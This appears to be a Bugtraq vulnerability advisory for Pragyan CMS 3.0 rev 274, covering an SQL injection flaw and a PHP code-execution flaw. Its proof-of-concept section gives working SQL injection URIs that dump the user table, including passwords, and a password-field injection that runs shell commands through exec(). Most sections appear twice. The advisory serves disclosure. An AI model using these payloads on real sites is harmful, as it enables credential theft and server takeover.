Pragyan CMS SQL Injection and PHP Code Execution Vulnerabilities
BID:46573
Info
Pragyan CMS SQL Injection and PHP Code Execution Vulnerabilities
| Bugtraq ID: | 46573 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 25 2011 12:00AM |
| Updated: | Feb 25 2011 12:00AM |
| Credit: | Abhishek Lyall |
| Vulnerable: |
Pragyan CMS Pragyan CMS 3.0 rev 274 Pragyan CMS Pragyan CMS 3.0 |
| Not Vulnerable: | |
Discussion
Pragyan CMS SQL Injection and PHP Code Execution Vulnerabilities
Pragyan CMS is prone to an SQL-injection vulnerability and a code-execution vulnerability because it fails to sufficiently sanitize user-supplied data.
Successfully exploiting these issues may allow an attacker to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or execute arbitrary PHP code in the context of the application.
Pragyan CMS 3.0 rev 274 is vulnerable; other versions may be affected.
Pragyan CMS is prone to an SQL-injection vulnerability and a code-execution vulnerability because it fails to sufficiently sanitize user-supplied data.
Successfully exploiting these issues may allow an attacker to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or execute arbitrary PHP code in the context of the application.
Pragyan CMS 3.0 rev 274 is vulnerable; other versions may be affected.
Exploit / POC
Pragyan CMS SQL Injection and PHP Code Execution Vulnerabilities
The following example URIs and input are available:
SQL-injection:
http://www.example.com/+view&thread_id=-1 UNION ALL SELECT null,null,null,null,concat(unhex(Hex(cast(@@version as char)))),null,null,null--
http://www.example.com/+view&thread_id=-1 UNION ALL SELECT null,null,null,null,(SELECT concat(0x7e,0x27,unhex(Hex(cast(pragyanV3_users.user_id as char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_name as char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_email as char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_password as char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_fullname as char))),0x27,0x7e) FROM `pragyan11`.pragyanV3_users LIMIT 0,1),null,null,null--
PHP code-execution:
password : ");echo exec($_GET["a"]);echo ("
The following example URIs and input are available:
SQL-injection:
http://www.example.com/+view&thread_id=-1 UNION ALL SELECT null,null,null,null,concat(unhex(Hex(cast(@@version as char)))),null,null,null--
http://www.example.com/+view&thread_id=-1 UNION ALL SELECT null,null,null,null,(SELECT concat(0x7e,0x27,unhex(Hex(cast(pragyanV3_users.user_id as char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_name as char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_email as char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_password as char))),0x3a,unhex(Hex(cast(pragyanV3_users.user_fullname as char))),0x27,0x7e) FROM `pragyan11`.pragyanV3_users LIMIT 0,1),null,null,null--
PHP code-execution:
password : ");echo exec($_GET["a"]);echo ("
Solution / Fix
Pragyan CMS SQL Injection and PHP Code Execution Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
Pragyan CMS SQL Injection and PHP Code Execution Vulnerabilities
References:
References:
- Pragyan CMS Multiple Vulnerabilities (Abhishek Lyall)
- Pragyan CMS Sourceforge Page (Pragyan CMS)